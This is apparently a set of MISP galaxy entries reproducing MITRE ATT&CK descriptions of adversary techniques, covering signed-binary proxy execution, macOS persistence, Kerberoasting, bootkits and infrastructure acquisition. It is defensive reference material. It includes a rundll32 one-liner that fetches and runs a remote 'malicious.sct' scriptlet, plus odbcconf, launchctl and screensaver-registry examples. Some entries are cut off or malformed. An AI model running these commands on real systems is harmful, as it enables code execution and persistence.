Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors. (Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).

The tag is: **misp-galaxy:mitre-attack-pattern="Hardware - T1592.001"**

**Table 3806. Table References**
Msiexec - T1218.007

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007"

Table 3807. Table References

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Odbcconf - T1218.008

Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.

Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](<a href="https://attack.mitre.org/techniques/T1218/010" class="bare">https://attack.mitre.org/techniques/T1218/010</a>), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>/S /A &lt;br&gt;Regsvr /c "C:\Users\Public\file.dll"&amp;rbr&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008"
Domains - T1583.001

Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)

The tag is: `misp-galaxy:mitre-attack-pattern="Domains - T1583.001"`
Domains - T1584.001

Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain. (Citation: Microsoft Sub Takeover 2020)

The tag is: misc-galaxy:mitre-attack-pattern="Domains - T1584.001"

Table 3810. Table References

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Keychain - T1555.001

Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users’ passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in `<code>~/Library/Keychains/</code>`, `<code>/Library/Keychains/</code>`, and `<code>/Network/Library/Keychains/</code>`. (Citation: Wikipedia keychain) The `<code>security</code>` command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.

To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.

The tag is: misc-galaxy:mitre-attack-pattern="Keychain - T1555.001"

Table 3811. Table References

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Launchctl - T1569.001

Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)

By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)

Running a command from launchctl is as simple as `<code>launchctl submit -l <labelName> — /Path/to/thing/to/execute "arg" "arg" "arg"</code>`. Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.

The tag is: **misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001"**

Table 3812. Table References

Links

- https://attack.mitre.org/techniques/T1569/001
- https://ss64.com/osx/launchctl.html

Malware - T1587.001

Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)

As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.

Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/)
Malware - T1588.001

Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).

The tag is: misp-galaxy:mitre-attack-pattern="Malware - T1588.001"

Table 3814. Table References

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Credentials - T1589.001

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.

Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be
exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: `misp-galaxy:mitre-attack-pattern="Credentials - T1589.001"

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**Software - T1592.002**

Adversaries may gather information about the victim’s host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open
Websites/Domains([https://attack.mitre.org/techniques/T1593](https://attack.mitre.org/techniques/T1593)) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: `misp-galaxy:mitre-attack-pattern="Software - T1592.002"`

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### Bootkit - T1542.003

Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

The tag is: `misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003"`

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### Firmware - T1592.003

Adversaries may gather information about the victim’s host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and
versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). (Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: `misp-galaxy:mitre-attack-pattern="Firmware - T1592.003"`

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**ROMMONkit - T1542.004**

Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)

ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.

The tag is: `misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004"`

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Screensaver - T1546.002

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. The Windows screensaver application scnsave.scr is located in `<code>C:\Windows\System32</code>`, and `<code>C:\Windows\sysWOW64</code>` on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (`<code>HKCU\Control Panel\Desktop</code>`) and could be manipulated to achieve persistence:

- `<code>SCRNSAVE.exe</code>` - set to malicious PE path
- `<code>ScreenSaveActive</code>` - set to '1' to enable the screensaver
- `<code>ScreenSaverIsSecure</code>` - set to '0' to not require a password to unlock
- `<code>ScreenSaveTimeout</code>` - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)

The tag is: `misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002"

Table 3820. Table References

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WHOIS - T1596.002

Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers. (Citation: WHOIS)

Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595)) or [Phishing for Information](https://attack.mitre.org/techniques/T1598), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
Tool - T1588.002

Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions. (Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).

Server - T1583.004

Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)
Botnet - T1583.005

Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. (Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing] (https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). (Citation: Imperva DDoS for Hire) (Citation: Krebs-Anna) (Citation: Krebs-Bazaar) (Citation: Krebs-Booter)

The tag is: *misp-galaxy:mitre-attack-pattern="Botnet - T1583.005"

Table 3824. Table References

Kerberoasting - T1558.003

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force] (https://attack.mitre.org/techniques/T1110). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015)

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force] (https://attack.mitre.org/techniques/T1110) attacks that
may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)

The tag is: *misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"

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Server - T1584.004

Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).

The tag is: *misp-galaxy:mitre-attack-pattern="Server - T1584.004"*
Tran - T1546.005

Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The `trap` command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like `ctrl+c` and `ctrl+d`.

Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format `trap 'command list' signals` where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)

The tag is: `misp-galaxy:mitre-attack-pattern="Trap - T1546.005"`

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<td><a href="https://bash.cyberciti.biz/guide/Trap_statement">https://bash.cyberciti.biz/guide/Trap_statement</a></td>
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Botnet - T1584.005

Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).

The tag is: `misp-galaxy:mitre-attack-pattern="Botnet - T1584.005"`

Table 3828. Table References

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<td><a href="https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation">https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation</a></td>
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</table>
CDNs - T1596.004

Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.

Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).

The tag is: misp-galaxy:mitre-attack-pattern="CDNs - T1596.004"

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Exploits - T1587.004

Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)

As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)

In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)

An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1203), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).

The tag is: *misp-galaxy:mitre-attack-pattern="Exploits - T1587.004"*

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**Exploits - T1588.005**

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**Table References**

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1735
Vulnerabilities - T1588.006

Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases. (Citation: National Vulnerability Database)

An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Vulnerabilities - T1588.006"

### Table 3832. Table References

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Rundll32 - T1218.011

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.

Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl
file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this:  
```<code>rundll32.exe javascript:\\mshtml\RunHTMLApplication";document.write();GetObject("script:https[:\]//www[.]example[.]com/malicious.sct")"></code>  
```

This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

The tag is: `misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011"`

**Table 3833. Table References**

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**Verclsid - T1218.012**

Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell. (Citation: WinOSBite verclsid.exe)

Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running `<code>verclsid.exe /S /C {CLSID}</code>`, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse. (Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub)

The tag is: `misp-galaxy:mitre-attack-pattern="Verclsid - T1218.012"`

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Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)

The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable. (Citation: Microsoft COR_PROFILER Feb 2013)

Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes. (Citation: RedCanary Mockingbird May 2020) (Citation: Red Canary COR_PROFILER May 2020) (Citation: Almond COR_PROFILER Apr 2019) (Citation: GitHub OmerYa Invisi-Shell) (Citation: subTee .NET Profilers May 2017)

The tag is: *misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012"*

**Table 3835. Table References**

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**Emond - T1546.014**

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1738)
that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at `<code>/sbin/emond</code>` will load any rules from the `<code>/etc/emond.d/rules/</code>` directory and take action once an explicitly defined event takes place.

The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path `<code>/private/var/db/emondClients</code>`, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at `<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>`.

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication. Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.

The tag is: `misp-galaxy:mitre-attack-pattern="Emond - T1546.014"`

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**Rc.common - T1163**

During the boot process, macOS executes `<code>source /etc/rc.common</code>`, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.

Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).

The tag is: `misp-galaxy:mitre-attack-pattern="Rc.common - T1163"`

Rc.common - T1163 has relationships with:

- **revoked-by**: `misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004"` with estimative-language:likelihood-probability="almost-certain"

### Table 3837. Table References
**Regsvcs/Regasm - T1121**

Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)

